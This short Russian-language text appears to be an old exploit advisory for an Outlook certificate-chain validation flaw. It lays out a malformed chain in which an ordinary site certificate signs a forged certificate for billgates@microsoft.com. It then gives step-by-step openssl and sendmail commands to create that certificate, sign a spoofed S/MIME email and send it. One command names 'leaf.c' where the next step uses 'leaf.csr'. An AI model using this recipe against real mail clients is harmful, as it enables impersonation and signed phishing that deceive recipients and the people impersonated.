Уязвимость в цепочке сертификатов в Outlook

Атакующий создает некорректную цепочку сертификатов:

[Issuer:VeriSign | Subject:VeriSign] > [Issuer:VeriSign | 
Subject:www.thoughtcrime.org] > [Issuer:www.thoughtcrime.org | 
Subject:Bill Gates/billgates@microsoft.com]

1. Поместите допустимый CA сертификат и секретный ключ в файл "middle.pem".
2. Создайте поддельный сертификат, подписывая запрос:
   1. openssl genrsa -out key.pem 1024
   2. openssl req -new -key key.pem -out leaf.c
3. Подпишите CSR с вашим "промежуточным" сертификатом:
   1. openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem -CAcreateserial -out leaf.pem
4. Подпишите поддельное E-mail сообщение:
   1. openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem -inkey key.pem -certfile middle.pem -from billgates@microsoft.com -to whomever@wherever.com -subject "SM Exploit"
5. Пошлите сообщение:
   a) cat mail.msg | sendmail whomever@wherever.com